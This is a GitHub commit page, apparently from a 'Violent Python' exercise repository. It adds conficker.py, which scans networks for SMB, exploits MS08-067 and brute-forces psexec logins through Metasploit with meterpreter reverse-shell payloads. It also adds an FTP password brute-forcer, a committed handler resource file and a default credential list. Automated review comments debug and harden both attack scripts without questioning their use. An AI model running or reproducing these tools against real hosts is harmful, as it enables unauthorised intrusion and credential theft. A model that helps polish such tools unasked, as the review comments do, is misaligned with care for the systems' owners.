8000 Add ftpscanner and conficker worm · andreffs18/violent-python@cd21bf5 · GitHub


Commit cd21bf5

committed
Add ftpscanner and conficker worm
1 parent 68e2665 commit cd21bf5


4 files changed

+143
-0
lines changed


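--- a/chapter2/conficker.py
+++ b/chapter2/conficker.py
@@ -0,0 +1,92 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import os
+import optparse
+import sys
+import nmap
+
+
+def find_hosts(host, port='445'):
+scanner = nmap.PortScanner()
+scanner.scan(host, port)
+hosts = []
+for host in scanner.all_hosts():
+if scanner[host].has_tcp(int(port)):
+if scanner[host]['tcp'][int(port)]['state'] == 'open':
+print('[+] Found Target Host: {}'.format(host))
+hosts.append(host)
+return hosts
+
+
+def setup_handler(config, local_host, local_port):
+config.write('use exploit/multi/handler\n')
+config.write('set payload windows/meterpreter/reverse_tcp\n')
+config.write('set LPORT {}\n'.format(str(local_port)))
+config.write('set LHOST {}\n'.format(local_host))
+config.write('exploit -j -z\n')
+config.write('setg DisablePayloadHandler 1\n')
+
+
+def conficker_exploit(config, target_host, local_host, local_port):
+config.write('use exploit/windows/smb/ms08_067_netapi\n')
+config.write('set RHOST {}\n'.format(target_host))
+config.write('set payload windows/meterpreter/reverse_tcp\n')
+config.write('set LPORT {}\n'.format(str(local_port)))
+config.write('set LHOST {}\n'.format(local_host))
+config.write('exploit -j -z\n')
+
+
+def smb_brute_force(config, target_host, local_host, local_port, username='Administrator', passwords=[]):
+for password in passwords:
+config.write('use exploit/windows/smb/psexec\n')
+config.write('set SMBUser {}\n'.format(username))
+config.write('set SMBPass {}\n'.format(password))
+config.write('set RHOST {}\n'.format(target_host))
+config.write('set payload windows/meterpreter/reverse_tcp\n')
+config.write('set LPORT {}\n'.format(str(local_port)))
+config.write('set LHOST {}\n'.format(local_host))
+config.write('exploit -j -z\n')
+
+
+def main():
+parser = optparse.OptionParser('[-] Usage %prog -H <target host[s]> -l <local port> [-p <local host> -F <password file>]')
+parser.add_option('-H', dest='target_host', type='string', help='specify the target address[es]')
+parser.add_option('-p', dest='local_port', type='string', help='specify the listen port')
+parser.add_option('-l', dest='local_host', type='string', help='specify the listen address')
+parser.add_option('-F', dest='password_file', type='string', help='password file for SMB brute force attempt')
+
+(options, args) = parser.parse_args()
+
+if options.target_host is None or options.local_host is None:
+print(parser.usage)
+exit(0)
+
+local_host = options.local_host
+local_port = options.local_port
+if not local_port:
+local_port = '1337'
+
+with open('meta.rc', 'w') as configFile:
+setup_handler(configFile, local_host, local_port)
+
+password_file = options.password_file
+passwords = open(password_file, "r").readlines()
+passwords = list(map(lambda l: l.strip(), passwords))
+
+target_hosts = find_hosts(options.target_host)
+print("[*] Found {} hosts from given {}".format(len(target_hosts), options.target_host))
+if not len(target_hosts):
+exit(0)
+
+for host in target_hosts:
+print("[*] Testing host {}...".format(host))
+conficker_exploit(configFile, host, local_host, local_port)
+smb_brute_force(configFile, host, local_host, local_port, passwords=passwords)
+
+os.system('msfconsole -r meta.rc')
+
+
+if __name__ == '__main__':
+main()
+# run as follows:
+# $ python conficker.py -H 192.168.1.30-50 -l 192.168.1.3 -F passwords.txt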
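Review bot: In `main()`, `open(password_file, "r")` runs even when `-F` is omitted, although the usage string brackets `-F` as optional; `open(None)` raises a TypeError, and the handle is never closed. Read the file conditionally, e.g. `passwords = []` followed by `if options.password_file:` and `with open(options.password_file) as fh: passwords = [l.strip() for l in fh]`. The usage string also swaps the flags (`-l <local port>`, `-p <local host>`) relative to the `add_option` calls, where `-p` is the port and `-l` the host. Indentation is not visible on this page, so confirm that the `conficker_exploit` and `smb_brute_force` calls still run inside the `with open('meta.rc', 'w')` block, since outside it they would write to a closed file. The generated `meta.rc` holds every candidate password in plaintext in the working directory and a copy appears to be committed alongside the script, so it is worth adding to `.gitignore`.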

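--- a/chapter2/ftp_scanner.py
+++ b/chapter2/ftp_scanner.py
@@ -0,0 +1,40 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+import ftplib
+from optparse import OptionParser
+
+
+def ftp_login(hostname, username, password):
+try:
+ftp = ftplib.FTP()
+ftp.connect(hostname, 21)
+ftp.login(username, password)
+print('[+] {} FTP Login Succeeded with {}:{}'.format(hostname, username, password))
+ftp.quit()
+return username, password
+except Exception as e:
+pass
+
+print('[-] Could not brute force FTP credentials {}:{}'.format(username, password))
+return None, None
+
+
+if __name__ == "__main__":
+parser = OptionParser('usage %prog -H <target host> -F <password lis>')
+parser.add_option('-H', dest='target_host', type=str, help='Specify target host.')
+parser.add_option('-F', dest='password_file', type=str, help='Specify file containing all possible user:passwords combinations.')
+
+(options, args) = parser.parse_args()
+
+if options.target_host is None or options.password_file is None:
+print(parser.usage)
+exit(0)
+
+fn = open(options.password_file, "r")
+for line in fn.readlines():
+username = line.split(':')[0]
+password = line.split(':')[1].strip('\r').strip('\n')
+print("[*] Testing: {}:{}".format(username, password))
+ftp_login(options.target_host, username, password)
+
+print(options)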
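Review bot: The `except Exception as e: pass` in `ftp_login` discards every failure, so a refused connection, a DNS error or a timeout is reported with the same "Could not brute force" line as a rejected login, and `e` is never used. Catch `ftplib.all_errors` instead and include the error in the message, and give the connection a bound, e.g. `ftp.connect(hostname, 21, timeout=10)` (the value is illustrative). In the `__main__` block, `line.split(':')[1]` raises IndexError on a line without a colon and truncates any password that contains one; `username, _, password = line.rstrip('\r\n').partition(':')` handles both. The handle `fn` is never closed, so a `with open(...)` block would be cleaner, and the trailing `print(options)` looks like leftover debug output.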

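--- a/chapter2/meta.rc
+++ b/chapter2/meta.rc
@@ -0,0 +1,6 @@
+use exploit/multi/handler
+set payload windows/meterpreter/reverse_tcp
+set LPORT 1337
+set LHOST 192.168.1.0
+exploit -j -z
+setg DisablePayloadHandler 1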

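--- a/chapter2/userpass.txt
+++ b/chapter2/userpass.txt
@@ -0,0 +1,5 @@
+administrator:password
+admin:12345
+root:secret
+guest:guest
+root:toor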
